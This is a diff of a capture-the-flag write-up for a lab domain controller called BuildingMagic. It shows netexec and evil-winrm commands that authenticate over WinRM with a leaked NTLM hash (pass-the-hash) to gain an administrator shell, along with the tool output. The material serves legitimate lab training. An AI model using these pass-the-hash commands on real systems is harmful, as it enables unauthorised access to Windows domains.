wolffangsecurity/CTF-Writeups/Hack Smarter Labs/BuildingMagic.md

 ```

-## Shell As Admin
+## Shell As Admin (a.flatch)
+I could then login using winrm and access the Adminstrator Desktop to directory to obtain the root.txt file
 ```
 └─$ netexec winrm 10.1.213.153 -u a.flatch -H 520126a03f5d5a8d836f1c4f34ede7ce
 WINRM       10.1.213.153    5985   DC01             [*] Windows Server 2022 Build 20348 (name:DC01) (domain:BUILDINGMAGIC.LOCAL)
-/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
-  arc4 = algorithms.ARC4(self._key)
 WINRM       10.1.213.153    5985   DC01             [+] BUILDINGMAGIC.LOCAL\a.flatch:520126a03f5d5a8d836f1c4f34ede7ce (Pwn3d!)

 ```

 ```
-└─$ evil-winrm -i 10.1.213.153 -u a.flatch -H 520126a03f5d5a8d836f1c4f34ede7ce
+evil-winrm -i 10.1.213.153 -u a.flatch -H 520126a03f5d5a8d836f1c4f34ede7ce

 Evil-WinRM shell v3.7